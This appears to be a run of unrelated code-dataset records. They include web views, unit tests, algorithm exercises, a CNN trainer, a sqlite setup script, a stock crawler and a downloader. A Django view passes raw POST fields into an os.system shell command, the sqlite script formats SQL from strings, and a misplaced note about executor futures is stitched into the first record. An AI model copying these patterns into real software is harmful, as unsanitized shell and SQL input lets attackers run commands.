user_is_self}\n\n\n@view_config(route_name='get_user_details', renderer='json')\ndef get_user_details(request):\n user_id = request.matchdict.get('user_id', -1)\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n user_dict = {}\n user_dict['userName'] = user.full_name\n user_dict['username'] = user.username\n user_dict['userPic'] = user.profile_picture\n user_dict['num_of_followed'] = user.num_of_followed\n user_dict['num_of_followers'] = user.num_of_followers\n if request.user:\n user_followers = FollowService.get_followers(request, user)\n user_dict['is_following'] = request.user.id in user_followers\n #if user is not logged in\n else:\n user_dict['is_following'] = False\n user_dict['slug'] = user.slug\n user_dict['id'] = user.id\n user_dict['userLoggedIn'] = True if request.user else False\n return user_dict\n\n\n@view_config(route_name='get_user_polls', renderer='json')\ndef get_user_polls(request):\n user_id = request.matchdict.get('user_id', None)\n dictt = []\n if user_id:\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n for poll in user.polls:\n poll_dictt = compile_poll_details(request, poll, request.user)\n dictt.append(poll_dictt)\n return {'activities': {'polls': dictt}}\n\n\n@view_config(route_name='get_comment_and_replies', renderer='json')\ndef get_comment_and_replies(request):\n user_id = request.matchdict.get('user_id', None)\n dictt = {'c_and_s': []}\n if user_id:\n activities = 
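`executor.submit` in the `__main__` block above discards the returned futures, so a failed download passes silently; collecting them and calling `result()` surfaces worker exceptions (sketch):

from concurrent.futures import ProcessPoolExecutor, as_completed

with ProcessPoolExecutor() as executor:
    futures = {executor.submit(download_image, url, IMAGE_FOLDER): url for url in img_urls}
    for fut in as_completed(futures):
        try:
            fut.result()  # re-raises any exception raised inside the worker
        except Exception as exc:
            print(f"{futures[fut].strip()} failed: {exc}")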
request.dbsession.query(Activity).filter(Activity.user_id == user_id, (Activity.activity_type == 'comment') | (Activity.activity_type == 'reply'))\n for activity in activities:\n source = get_source(request, activity)\n source_id = activity.source_id\n activity = request.dbsession.query(source).filter(source.id == source_id).first()\n object_is_poll = None\n object_is_opinion = None\n if source == Comment:\n try:\n object_is_poll = activity.poll != None\n except Exception as e:\n print(e)\n\n try:\n object_is_opinion = activity.opinion != None\n\n except Exception as e:\n print(e)\n\n comment_dictt = {\n 'type': 'comment',\n 'comment_id': activity.id,\n 'commenterInitals': activity.added_by.initials,\n 'commenter': activity.added_by.full_name,\n 'comment': activity.comment,\n 'option_chosen': activity.option.title,\n 'poll': activity.poll.question if object_is_poll else None, # remember to add object\n 'opinion': activity.opinion.opinion if object_is_opinion else None\n }\n if object_is_poll:\n comment_dictt['poll'] = {\n\t\t\t\t\t 'userName': activity.poll.added_by.full_name, \n\t\t\t\t\t 'question': activity.poll.question,\n\t\t\t\t\t 'slug': activity.poll.slug, \n\t\t\t\t\t\n\t\t\t\t }\n if object_is_opinion:\n comment_dictt['opinion'] = {\n 'userName': activity.opinion.added_by.full_name,\n 'opinion': activity.opinion.opinion,\n }\n dictt['c_and_s'].append(comment_dictt)\n\n return dictt\n\n\n@view_config(route_name='get_likes_and_shares', renderer='json')\ndef get_likes_and_shares(request):\n user_id = request.matchdict.get('user_id', None)\n dictt = {'l_and_s': []}\n if user_id:\n activities = request.dbsession.query(Activity).filter(Activity.user_id == user_id, (Activity.activity_type == 'like') | (Activity.activity_type == 'share'))\n\n for activity in activities:\n source = get_source(request, activity)\n source_id = activity.source_id\n activity = request.dbsession.query(source).filter(source.id == source_id).first()\n object_is_poll = None\n object_is_opinion = None\n object_is_comment = None\n object_is_reply = None\n\n if source == Share:\n try:\n object_is_poll = activity.poll != None\n except Exception as e:\n print(e)\n\n try:\n object_is_opinion = activity.opinion != None\n\n except Exception as e:\n print(e)\n\n try:\n object_is_comment = activity.comment != None\n except Exception as e:\n print(e)\n\n try: \n object_is_reply = activity.reply != None\n except Exception as e: \n print(e)\n \n if object_is_poll: \n poll_dictt = compile_poll_details(request, activity, request.user)\n dictt['l_and_s'].append(poll_dictt)\n\n\n if source == Like: \n try:\n object_is_poll = activity.poll != None\n except Exception as e:\n print(e)\n\n try:\n object_is_opinion = activity.opinion != None\n\n except Exception as e:\n print(e)\n\n try:\n object_is_comment = activity.comment != None\n except Exception as e:\n print(e)\n\n try: \n object_is_reply = activity.reply != None\n except Exception as e: \n print(e) \n\n\n if object_is_poll:\n activity = activity.poll \n poll_dictt = compile_poll_details(request, activity, request.user)\n dictt['l_and_s'].append(poll_dictt) \n\n return dictt\n \n\n\n@view_config(route_name='get_posts', renderer='json')\ndef get_posts(request):\n dictt = {'opinions': []}\n user_id = request.matchdict.get('user_id', None)\n if user_id:\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n for opinion in user.opinions:\n op_dictt = compile_opinion_details(request, opinion, request.user)\n dictt['opinions'].append(op_dictt)\n return 
dictt\n\n\n@view_config(route_name='get_slug', renderer='json')\ndef get_slug(request):\n user_id = request.matchdict.get('user_id', None)\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n user_slug = user.slug\n return {'userSlug': user_slug}","sub_path":"views/profile_actions.py","file_name":"profile_actions.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"391086678","text":"\"\"\"\n@copyright: (c)Copyright 2014, Intel Corporation All Rights Reserved.\nThe source code contained or described here in and all documents related to the source code (\"Material\") are owned by\nIntel Corporation or its suppliers or licensors. Title to the Material remains with Intel Corporation or its suppliers\nand licensors. The Material contains trade secrets and proprietary and confidential information of Intel or its\nsuppliers and licensors.\n\nThe Material is protected by worldwide copyright and trade secret laws and treaty provisions. No part of the Material\nmay be used, copied, reproduced, modified, published, uploaded, posted, transmitted, distributed, or disclosed\nin any way without Intel's prior express written permission.\n\nNo license under any patent, copyright, trade secret or other intellectual property right is granted to or conferred\nupon you by disclosure or delivery of the Materials, either expressly, by implication, inducement, estoppel or\notherwise. Any license under such intellectual property rights must be express and approved by Intel in writing.\n\n:organization: INTEL MCG PSI\n:summary: unit test\n:since 10/09/2014\n:author: jfranchx\n\"\"\"\nimport mock\n\nfrom unit_test.UtTestStep.UTestTestStepBase import UTestTestStepBase\nfrom Core.TestStep.TestStepContext import TestStepContext\nfrom acs_test_scripts.TestStep.Device.Wireless.Common.IPMgmt.GetMacAddress import GetMacAddress\nfrom UtilitiesFWK.Utilities import TestConst\n\n\nclass GetMacAddressTest(UTestTestStepBase):\n \"\"\"\n GetMacAddress test cases\n \"\"\"\n\n WIFI_MAC_ADDRESS = \"AA:BB:CC:DD:EE:FF\"\n\n def setUp(self):\n \"\"\"\n Set up\n \"\"\"\n UTestTestStepBase.setUp(self)\n self._dest_var = \"mac_address\"\n self._context = TestStepContext()\n\n def test_get_mac_address_ok(self):\n sut = self._create_sut({\"INTERFACE\": \"wlan0\"})\n\n value_expected = self.WIFI_MAC_ADDRESS\n self._method.return_value = self.WIFI_MAC_ADDRESS\n\n sut.run(self._context)\n value_got = self._context.get_info(self._dest_var)\n self._method.assert_called_once_with(\"wlan0\")\n self.assertEqual(value_expected, value_got)\n\n def test_get_mac_address_fail(self):\n\n sut = self._create_sut({\"INTERFACE\": \"invalid_interface\"})\n self._method.return_value = self.WIFI_MAC_ADDRESS\n self._assert_run_throw_config_exception(sut, \"Only wlan0 interface is supported - can't get invalid_interface MAC address\")\n\n # pylint: disable=W0212\n def _create_sut(self, args={}):\n \"\"\"\n Create the SUT with only test step pars\n \"\"\"\n test_args = {\"MAC_ADDR\": self._dest_var}\n test_args.update(args)\n sut = GetMacAddress(None, None, test_args, mock.Mock())\n self._method = sut._api.get_interface_mac_addr\n return sut\n","sub_path":"ACS_v.18.20.4_1/ACS/acs_test_scripts/test/unit_test/UtTestStep/UtDevice/UtWireless/UtCommon/UtIPMgmt/test_GetMacAddress.py","file_name":"test_GetMacAddress.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
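[Editor's note] The test_GetMacAddress.py record above exercises a test step against a mocked device API (the `sut._api` wiring plus `assert_called_once_with`). A minimal self-contained sketch of the same pattern, with a hypothetical `GetAddress` step standing in for the project's real class:

    from unittest import mock

    class GetAddress:
        """Hypothetical test step: delegates to an injected device API."""
        def __init__(self, api):
            self._api = api  # device API object, replaced by a mock in tests
        def run(self, interface):
            return self._api.get_interface_mac_addr(interface)

    api = mock.Mock()
    api.get_interface_mac_addr.return_value = "AA:BB:CC:DD:EE:FF"
    sut = GetAddress(api)
    assert sut.run("wlan0") == "AA:BB:CC:DD:EE:FF"
    api.get_interface_mac_addr.assert_called_once_with("wlan0")  # stub saw the right interface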
+{"seq_id":"644743902","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 18 11:28:50 2018\n\n@author: owen\n\"\"\"\n\n# Given n nodes in a graph labeled from 1 to n. There are no edges in the graph at the beginning.\n\n# You need to support the following method:\n\n# connect(a, b), add an edge to connect node a and node b\n# query(), returns the number of connected components in the graph\n\n# Number of connected components; Connecting Graph II asks for the node count of each component\n\n# similar to Number of Islands II\n\nclass UnionFind(object):\n \n def __init__(self, n):\n self.cnt = n # count of connected component\n self.parents = {}\n for i in range(1, n + 1): # labels are from 1 to n\n self.parents[i] = i \n \n def find(self, x):\n if self.parents[x] != x:\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n \n def union(self, x, y):\n rootx, rooty = self.find(x), self.find(y)\n if rootx != rooty:\n self.parents[rootx] = rooty\n self.cnt -= 1\n\n\nclass ConnectingGraph3:\n \"\"\"\n @param a: An integer\n @param b: An integer\n @return: nothing\n \"\"\"\n def __init__(self, n):\n self.uf = UnionFind(n)\n \n def connect(self, a, b):\n # write your code here\n self.uf.union(a, b)\n \n \"\"\"\n @return: An integer\n \"\"\"\n def query(self):\n # write your code here\n return self.uf.cnt\n \n \n \nif __name__==\"__main__\":\n obj = ConnectingGraph3(5)\n print(obj.query())\n obj.connect(1, 2)\n print(obj.query())\n obj.connect(2, 4)\n print(obj.query())\n obj.connect(1, 4)\n print(obj.query())\n\n obj = ConnectingGraph3(6)\n print(obj.query())\n print(obj.query())\n print(obj.query())\n obj.connect(5, 6)\n print(obj.query())\n obj.connect(1, 4)\n print(obj.query())\n obj.connect(4, 6)\n print(obj.query())\n print(obj.query())\n print(obj.query())\n print(obj.query())\n \n \n \n \n \n \n","sub_path":"Connecting Graph III.py","file_name":"Connecting Graph III.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"165563398","text":"\ndef fibonacci(num): # (int) list\n a, b = 1, 0\n while num != 0:\n a, b = a+b, a\n num -= 1\n return b\n\n# The code below is for printing test output.\nif __name__ == '__main__':\n print(fibonacci(3)) # 2, [1, 1, 2]\n print(fibonacci(4)) # 3, [1, 1, 2, 3]\n print(fibonacci(6)) # 8, [1, 1, 2, 3, 5, 8]\n","sub_path":"Programmers/01_Level1/005_fibonacci/py-01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"106456433","text":"from datetime import datetime as dt\ndef time_to(useIn):\n if useIn >= 24:\n return \"error\"\n else:\n hour = dt.now().hour\n minute = dt.now().minute\n hour += 1\n hour = useIn - hour\n minute = 60 - minute\n if hour == 0:\n hour = 0\n print(\"fc\")\n return hour,minute\n elif hour < 1:\n next_day_hour = dt.now().hour\n next_day_min = dt.now().minute\n next_day_hour += 1\n next_day_hour = 24 - next_day_hour\n next_day_min = 60 - next_day_min\n next_day_hour += useIn\n print(\"sc\")\n return next_day_hour,minute\n else:\n print(\"tc\")\n return hour,minute\nwhile(True):\n var = int(input())\n print(time_to(var))\n","sub_path":"website_blocker/time_to.py","file_name":"time_to.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"195046443","text":"import warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", 
category=DeprecationWarning)\n\nimport librosa\nimport librosa.feature\n\nimport os, glob, math\nimport random\nimport numpy as np\nimport argparse\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, BatchNormalization\nfrom keras.layers import Activation\nfrom keras.utils.np_utils import to_categorical\n\n# Preferences\nCLASS_LABEL = [\"blues\", \"classical\", \"country\", \"disco\", \"hiphop\", \"jazz\", \"metal\", \"pop\", \"reggae\", \"rock\"]\nDATA_FOLDER = 'genres'\n\nTRAIN_TEST_SPLIT = 0.8\nTRAINING_EPOCHS = 80\nBATCH_SIZE = 32\n\nload_weight = False\nsave_weight = True\n\nWEIGHTS_FOLDER = \"./Models\"\nWEIGHTS_FILENAME = \"convnet_weights_default.h5\"\n\ndef extract_features(filename):\n sound, sr = librosa.load(filename)\n\n spectrogram = librosa.feature.melspectrogram(y = sound, sr = sr, n_fft = 2048, hop_length = 512)\n\n # Normalize spectrogram\n spectrogram = librosa.power_to_db(spectrogram, ref = np.max)\n spectrogram = spectrogram[:, :1000]\n\n #print(np.shape(spectrogram))\n\n return np.array(spectrogram)\n\ndef generate_features_labels():\n all_features = []\n all_labels = []\n\n for class_name in CLASS_LABEL:\n print(\"Loading class\", class_name)\n sound_files = glob.glob(DATA_FOLDER + \"/\" + class_name + \"/*.wav\")\n\n for f in sound_files:\n #print(\"Loading file\", f)\n feature = extract_features(f)\n all_features.append(feature)\n all_labels.append(class_name)\n\n # Convert labels to one-hot\n label_unique_ids, label_row_ids = np.unique(all_labels, return_inverse = True)\n label_row_ids = label_row_ids.astype(np.int32, copy = False)\n label_one_hot = to_categorical(label_row_ids, len(label_unique_ids))\n\n return np.stack(all_features), label_one_hot\n\ndef generate_train_test_sets(all_features, all_labels):\n print(\"Features: \", np.shape(all_features))\n print(\"Labels: \", np.shape(all_labels))\n\n index_train = random.sample(list(np.arange(len(all_features))), k=int(len(all_features) * TRAIN_TEST_SPLIT))\n index_test = []\n\n for i in range(len(all_features)):\n if i not in index_train:\n index_test.append(i)\n\n #print(len(index))\n #print(index)\n\n trainX = []\n trainY = []\n testX = []\n testY = []\n\n for i in index_train:\n trainX.append(all_features[i])\n trainY.append(all_labels[i])\n\n for i in index_test:\n testX.append(all_features[i])\n testY.append(all_labels[i])\n\n # Reshape for CNN input\n trainX = np.array([x.reshape((128, 1000, 1)) for x in trainX])\n testX = np.array([x.reshape((128, 1000, 1)) for x in testX])\n trainY = np.array([y.reshape((10)) for y in trainY])\n testY = np.array([y.reshape((10)) for y in testY])\n\n print(np.shape(trainX))\n print(np.shape(trainY))\n print(np.shape(testX))\n print(np.shape(testY))\n\n return trainX, trainY, testX, testY\n\ndef create_model(input_dim, output_dim):\n model = Sequential()\n\n # build network topology\n model = Sequential()\n\n # 1st Conv2D layer\n model.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_dim))\n model.add(MaxPooling2D((3, 3), strides=(2, 2), padding='same'))\n model.add(BatchNormalization())\n\n # 2nd Conv2D layer\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D((3, 3), strides=(2, 2), padding='same'))\n model.add(BatchNormalization())\n\n # 3rd Conv2D layer\n model.add(Conv2D(32, (2, 2), activation='relu'))\n model.add(MaxPooling2D((2, 2), strides=(2, 2), padding='same'))\n model.add(BatchNormalization())\n\n # Flatten output and feed it into dense layer\n 
model.add(Flatten())\n model.add(Dense(64, activation='relu'))\n model.add(Dropout(0.3))\n\n # Output layer\n model.add(Dense(output_dim, activation='softmax'))\n\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n return model\n\ndef training_session():\n all_features, all_labels = generate_features_labels()\n\n trainX, trainY, testX, testY = generate_train_test_sets(all_features, all_labels)\n\n #print(np.shape(trainX))\n #print(np.shape(trainY))\n\n model = create_model((128, 1000, 1), 10)\n\n if load_weight:\n print(\"Loading previous weight\")\n try:\n model.load_weights(os.path.join(WEIGHTS_FOLDER, WEIGHTS_FILENAME))\n except Exception as e:\n print(\"Error loading weight file\")\n print(e)\n\n model.fit(trainX, trainY, epochs=TRAINING_EPOCHS, batch_size=BATCH_SIZE, verbose=1)\n\n loss, acc = model.evaluate(testX, testY, batch_size=32)\n\n print(\"Loss:\", loss, \"Accuracy:\", acc)\n\n if save_weight:\n print(\"Saving weight\")\n try:\n model.save_weights(WEIGHTS_FOLDER + \"/\" + WEIGHTS_FILENAME)\n except Exception as e:\n print(\"Error saving weight\")\n print(e)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--weight_file\", help=\"Specify weights filename\", default=\"convnet_weights_default.h5\")\n parser.add_argument(\"-ff\", \"--weight_folder\", help=\"Specify where to save weights\", default=\"./Models\")\n parser.add_argument(\"-l\", \"--load\", help=\"Load trained weights (Maybe unstable)\", type=bool, default=False)\n parser.add_argument(\"-ns\", \"--no_save\", help=\"Don't save trained weights\", type=bool, default=False)\n\n args = parser.parse_args()\n\n WEIGHTS_FILENAME = args.weight_file\n WEIGHTS_FOLDER = args.weight_folder\n\n load_weight = args.load\n save_weight = not args.no_save\n\n training_session()","sub_path":"genre-classification-model/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"380515219","text":"'''This document was used for various sqlite setup tasks (and a few other task)\n including, but not limited to, creating, updating, altering, and clearing,\n and deleting tables in the database'''\n\nimport sqlite3\nimport time\nfrom datetime import date\n\ndatabase = sqlite3.connect('munus.db', isolation_level = None)\ndb = database.cursor()\n\na = input('what function do you want to do?')\n\nif a == 'create':\n db.execute('CREATE TABLE orders(user_id INTEGER, product_id INTEGER, wtp INTEGER, expir TIME, id INTEGER PRIMARY KEY);')\n\nif a == 'test':\n print(db.execute('SELECT * FROM orders').fetchall())\n\nif a == 'unique':\n db.execute(\"DROP TABLE history\")\n\nif a == 'display':\n for i in range(1):print(db.execute('SELECT * FROM products ORDER BY id DESC').fetchall()[:10000][i])\n #print(db.execute(\"SELECT * FROM products WHERE store == 'animezakka';\").fetchall()[:10])\n\nif a=='dorm crew':\n db.execute(\"INSERT INTO products (store, name, price, id) VALUES ('dormcrew', 'Toilet Paper', 0, 19988);\")\n\nif a in ['&pizza', 'saloniki','swissbakers','animezakka','crimsoncorner', 'staples', 'thecoop']:\n f = open(a+'.txt', 'r')\n b = f.readline()\n b = f.readline()\n count = 20000\n while b:\n print(b,'this is b')\n b = b.replace('\\n','').split(', ')\n statement = \"INSERT INTO products (store, name, price, id) VALUES (\\\"{0}\\\", \\\"{1}\\\", {2}, {3});\".format(a, b[0], b[1], count)\n print(statement)\n try:\n 
db.execute(statement)\n except Exception as e:\n print(e)\n b = f.readline()\n count+=1\n\nif a == 'a':\n print(db.execute(\"ALTER TABLE products ADD id INTEGER;\"))\n\nif a == 'x':\n for j in range(19988):\n statement1 = \"SELECT name FROM products ORDER BY name LIMIT 1 OFFSET {0};\".format(j)\n try:\n statement = \"UPDATE products SET id = {0} WHERE name = \\\"{1}\\\";\".format(j, db.execute(statement1).fetchone()[0])\n db.execute(statement)\n except:\n try:\n statement = \"UPDATE products SET id = {0} WHERE name = '{1}';\".format(j, db.execute(statement1).fetchone()[0])\n db.execute(statement)\n except Exception as e:\n print('error',e)\n time.sleep(4)\n if j%1000 == 0:\n print(j)\n\nif a == \"add\":\n db.execute(\"UPDATE users SET money = 10000000 WHERE email = 'a@a.a';\")\n\nif a =='day':\n f = open('day.txt', 'w')\n print(date.today(), file = f)\n f.close()\n\nif a == 'delete':\n db.execute(\"DELETE FROM orders;\")\n db.execute(\"DELETE FROM users\")\n db.execute(\"DELETE FROM history\")\n","sub_path":"one_time.py","file_name":"one_time.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363224656","text":"import json\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom .forms import buyAndSellForm\nimport os\nfrom channels import Group\n\n# Create your views here.\n\n'''def form(request) :\n\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = buyAndSellForm(request.POST)\n # check whether it's valid:\n print(form.errors)\n message = \"Something went Wrong, Try Again please\"\n if form.is_valid():\n # process the data in form.cleaned_data as required\n print(form.cleaned_data[\"Amount\"])\n message = \"Your order is Sended\"\n \n return HttpResponse((json.dumps({'message': message})))\n else:\n form = buyAndSellForm()\n\n return HttpResponse(print(form.errors))'''\n\ndef create_post(request):\n \n if request.method == 'POST':\n\n Limit = request.POST.get('Limit')\n amount = request.POST.get('amount')\n price = request.POST.get('price')\n cmd = request.POST.get('cmd')\n print(cmd)\n print(request.user.username)\n response_data = {}\n\n #\n os.system(\"cd ../scripts && ./book \"+cmd+\" \"+request.user.username+\" \"+price+\" \"+amount)\n os.system(\"cd ../scripts && ./book match\")\n \n # Ask for the reload of Order tables / Chart / Tickers \n result = {}\n result['text'] = 'Data Updated'\n Group(\"update\").send(result)\n\n #We will ask the data in redis in orderAndTrade\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n else:\n return HttpResponse(\n json.dumps({\"nothing to see\": \"this isn't happening\"}),\n content_type=\"application/json\"\n )","sub_path":"mysite/buyAndSell/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439890997","text":"# -*- coding: UTF-8 -*-\nimport os\n\nfrom .request import Request, RequestGroup\nfrom .downloader import Downloader\nfrom .downloader.client import get_client\nfrom .downloader.console import Console\nfrom .downloader.file import File\nfrom .downloader.struct.block import BlockManager\nfrom .downloader.struct.progress import Progress\nfrom .downloader.url.manager import UrlManager\nfrom .error import RequestError, MaxRetriesExceededError, 
MissingBlockError\nfrom .utils import saver\n\n\ndef dlopen(request, max_retries=None, **configure):\n \"\"\"\n 如果request提供的是str类型,那么将作为下载配置文件的路径读取导入下载器。\n 如果request提供的是Request对象,那么将作为新的下载文件进行处理。\n\n :param\n request : 下载请求对象Request\n max_retries : 最大重试次数\n\n 基本下载配置属性:\n **configure : 下载配置\n max_thread : 下载线程数。\n unit_size : 下载块单元大小。\n max_buff : 最大下载磁盘缓存大小。\n timeout : 客户端连接超时时间。\n :return\n Downloader : 下载器对象\n \"\"\"\n if type(request) is str:\n dl = _dlopen_nbcfg(request, **configure)\n elif isinstance(request, Request):\n dl = _dlopen_request(request, max_retries, **configure)\n elif isinstance(request, RequestGroup):\n dl = _dlopen_group(request, **configure)\n else:\n raise TypeError('参数request不支持的类型。')\n\n return dl\n\n\ndef _dlopen_request(request, max_retries=None, **configure):\n \"\"\" 打开下载请求对象,并构建返回下载对象。\"\"\"\n # :::::建立下载配置,dlopen的配置信息优先于request的配置信息。\n actual_config = request.configure\n # 移除options选项,而是进行更新进来\n actual_config.pop('options')\n # 将额外参数添加到控制台配置的options参数里面,以提供给下载客户端。\n actual_config.update(request.options)\n actual_config.update(configure)\n\n # 预备构建下载对象。\n url = UrlManager()\n # 创建初始化打开进度\n progress = Progress((0,))\n url.open_request(request)\n\n max_retries = max_retries or actual_config.pop('max_retries')\n\n source_wrap = url.get(0)\n\n source = source_wrap.get()\n cli_hdl = get_client(source.protocol)\n\n while True:\n try:\n # 尝试使用下载客户端收集下载对象所需信息。\n cli, name, size, partial = cli_hdl.dlopen(source, progress, True, timeout=request.timeout)\n except RequestError as e:\n if max_retries is None or max_retries > 0:\n continue\n raise MaxRetriesExceededError(e)\n else:\n\n # :::::建立文件File对象\n size = size or float('inf')\n path, request_name = os.path.split(actual_config.pop('file_path'))\n if request_name:\n name = request_name\n overwrite = actual_config.pop('overwrite')\n downloading_extension = actual_config.get('downloading_extension', '.downloading')\n file = File(path, name, size, overwrite=overwrite, downloading_extension=downloading_extension)\n\n # :::::建立下载块实体和管理器对象\n # 更新进度文件信息。\n progress = Progress((0, size))\n # 更新客户端的进度对象,因为这个客户端在后续需要使用。\n cli.progress = progress\n # 构建下载块映射图对象。\n block_mgr = BlockManager(request.unit_size, file.size)\n block_mgr.insert(cli, progress)\n\n # :::::更新下载配置文件路径信息\n if not actual_config['nbcfg']:\n actual_config['nbcfg'] = os.path.join(file.path, file.name) + '.nbcfg'\n # 非partial请求的情况下强制最大线程数1条,避免多开线程。\n if not partial:\n actual_config['max_thread'] = 1\n\n # :::::创建配置控制台。\n console = Console(file, url, block_mgr, partial, **actual_config)\n # 装配下载器\n dl = Downloader(console, True)\n return dl\n\n\ndef _dlopen_nbcfg(request, fix_error=True, **configure):\n \"\"\" 打开nb下载配置文件,并构建返回下载器对象。\"\"\"\n # 下载配置文件路径\n snapshot = saver.load(request, method=('gzip', 'json'))\n console = Console.load(snapshot)\n # 更新下载配置文件。\n configure['nbcfg'] = request\n console.config(**configure)\n dl = Downloader(console, False)\n # 下载配置文件下载块完整性检查。\n missing = dl.block_mgr.integrity_check()\n if missing:\n if not fix_error:\n raise MissingBlockError(missing)\n else:\n # 自动填补缺失的下载块。\n source_wrap = dl.url.get(0)\n source = source_wrap.get()\n for r in missing:\n progress = Progress(r)\n client = get_client(source_wrap).dlopen(source, progress, True, timeout=dl.body.config['timeout'])\n dl.block_mgr.insert(client, progress)\n\n return dl\n\n\ndef _dlopen_group(request_group, **configure):\n \"\"\" 打开请求组建立下载管理池。\"\"\"\n from .manager.manager import Manager\n config = request_group.configure\n config.update(configure)\n mgr = Manager(**config)\n 
for request in request_group:\n mgr.putrequest(request)\n\n return mgr\n","sub_path":"nbdler/_api.py","file_name":"_api.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"134355005","text":"import requests\nimport json\nimport sys\nfrom db_connector import mysql_db\n\ncodes = json.load(open('codes.json', encoding='utf-8'))\nmysql_conn = mysql_db()\n\n\nfor num, code_dic in enumerate(codes):\n    print(num, len(codes))\n    data_list = list()\n    url = 'https://finance.daum.net/api/charts/{}/days?limit=730&adjusted=true'\n    referer = 'http://finance.daum.net/quotes/{}'\n    code = code_dic['symbolCode']\n    url_added_code = url.format(code)\n    referer_added_code = referer.format(code)\n    headers = {\n        'Referer': referer_added_code,\n        'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n    }\n\n    data = requests.get(url_added_code,headers=headers)\n    json_data = json.loads(data.text)\n    '''\n    date : date\n    openingPrice : opening price\n    tradePrice : closing price\n    highPrice : high price\n    lowPrice : low price\n    candleAccTradeVolume : trading volume\n    '''\n    datas = json_data['data']\n    for data in datas:\n        #dt = datetime.datetime.strptime(data['date'], '%Y-%m-%d')\n        data_dict = {\n            'stock_name': code_dic['name'],\n            'stock_date': data['date'],\n            'open_price': data['openingPrice'],\n            'close_price': data['tradePrice'],\n            'high_price': data['highPrice'],\n            'low_price': data['lowPrice'],\n            'day_volume': data['candleAccTradeVolume'],\n        }\n        data_list.append(data_dict)\n\n    mysql_conn.insert_dump_dict('stock_info', data_list)\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"353920954","text":"from flask import current_app\nfrom sqlalchemy import func\n\nfrom nptimelapse.extensions import celery, db\nfrom nptimelapse.map_maker import Map\nfrom nptimelapse.model import Game, Star, Owner\n\nimport logging\nimport os\nimport os.path\nimport glob\nfrom math import sqrt\nimport moviepy.editor as mpy\n\n\n# Errors\nclass TimelapseError(Exception):\n    pass\n\nclass TimelapseGameNotRegisteredError(TimelapseError):\n    def __init__(self, game_id):\n        self.game_id = game_id\n        super().__init__(f'Game {game_id} is not registered')\n\nclass TimelapseTmpFolderExistsError(TimelapseError):\n    def __init__(self, path):\n        self.path = path\n        super().__init__(f'tmp folder already exists at {path}')\n\n\n@celery.task\ndef make_timelapse(game_id, tl_path, map_config={}):\n    logging.basicConfig(format='%(asctime)s|%(levelname)s| %(message)s',\n        filename=os.path.join(current_app.instance_path, 'vid_gen.log'),\n        level=logging.INFO)\n    logging.info(f'Generate timelapse {game_id}')\n    \n    # Make sure the video cache exists\n    video_cache = os.path.join(current_app.instance_path, 'video_cache')\n    if not os.path.exists(video_cache):\n        os.mkdir(video_cache)\n\n    # Get basic game info\n    game_data = db.session.query(func.min(Owner.tick), func.max(Owner.tick), Game) \\\n        .filter(Game.id == game_id).join(Game.owners).group_by(Game.id).one_or_none()\n    if game_data is None:\n        logging.error(f'Attempt to generate unregistered game {game_id}')\n        raise TimelapseGameNotRegisteredError(game_id)\n    start_tick, end_tick, game = game_data\n    tl_path = os.path.join(video_cache, f'{tl_path}')\n\n    # Check for tmp folder to see if the timelapse is not being created by another worker\n    tmp_folder = 
